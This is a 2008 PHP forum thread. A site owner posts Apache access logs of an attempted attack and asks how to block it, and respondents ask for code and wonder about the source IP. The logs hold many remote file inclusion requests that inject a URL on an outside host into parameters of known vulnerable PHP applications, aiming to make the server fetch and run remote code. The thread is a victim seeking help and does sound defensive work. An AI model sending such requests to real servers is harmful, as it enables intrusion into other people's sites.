PHP security

**TheServant** · May 20 '08, 10:15 PM

We need to see you code, and for a whole site, that is hard. Where do you think they're getting in from? Post that code if you have an idea.

**dlite922** · May 21 '08, 12:08 AM

Originally posted by martinjamesrobe rts

Hi I am a newb to all this so please ignore my ignorance...

This morning I have discovered someone has tried to exploit my site. The information is below.. my index.php file contains a flash file which has a form, the PHP for which is in a separate file named 'feedback.php.

Basically I want to stop these exploits and I wonder how I can do it?? I have asked on a few forums but nothing is working!! It seems I need to somehow restrict access or redirect bad requests.. please help I can;t afford to be blacklisted for this..

Many Thanks

Code:

209.3.11.34 - - [20/May/2008:01:14:38 +0200] "GET /admin/business_inc/saveserver.php?thisdir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
209.3.11.34 - - [20/May/2008:01:14:38 +0200] "GET /dotproject/includes/db_adodb.php?baseDir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
209.3.11.34 - - [20/May/2008:01:14:39 +0200] "GET /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
209.3.11.34 - - [20/May/2008:01:14:40 +0200] "GET /saveserver.php?thisdir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
209.3.11.34 - - [20/May/2008:01:14:41 +0200] "GET /index.php?page=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
209.3.11.34 - - [20/May/2008:01:14:41 +0200] "GET /index.php?x=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
65.36.241.81 - - [20/May/2008:02:02:09 +0200] "HEAD / HTTP/1.1" 200 0
81.80.12.13 - - [20/May/2008:02:18:13 +0200] "GET / HTTP/1.0" 200 3983
209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
209.3.11.34 - - [20/May/2008:02:22:03 +0200] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
209.3.11.34 - - [20/May/2008:02:22:03 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
65.36.241.81 - - [20/May/2008:03:03:55 +0200] "HEAD / HTTP/1.1" 200 0
209.3.11.34 - - [20/May/2008:03:13:48 +0200] "GET /phplive/help.php?css_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
209.3.11.34 - - [20/May/2008:03:13:49 +0200] "GET /webcalendar/tools/send_reminders.php?includedir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

Haven't seen it in a long time, but is that the Apache log? I don't get it...is this your site? http://82.127.69.88/

or is that the hacker's/exploiter's site?

I don't know how you're gonna get black listed if its a contact form that sends email to you? You're not an email server.

Let me know if i've got this all wrong.

Dan

PHP security

PHP security

Comment

Comment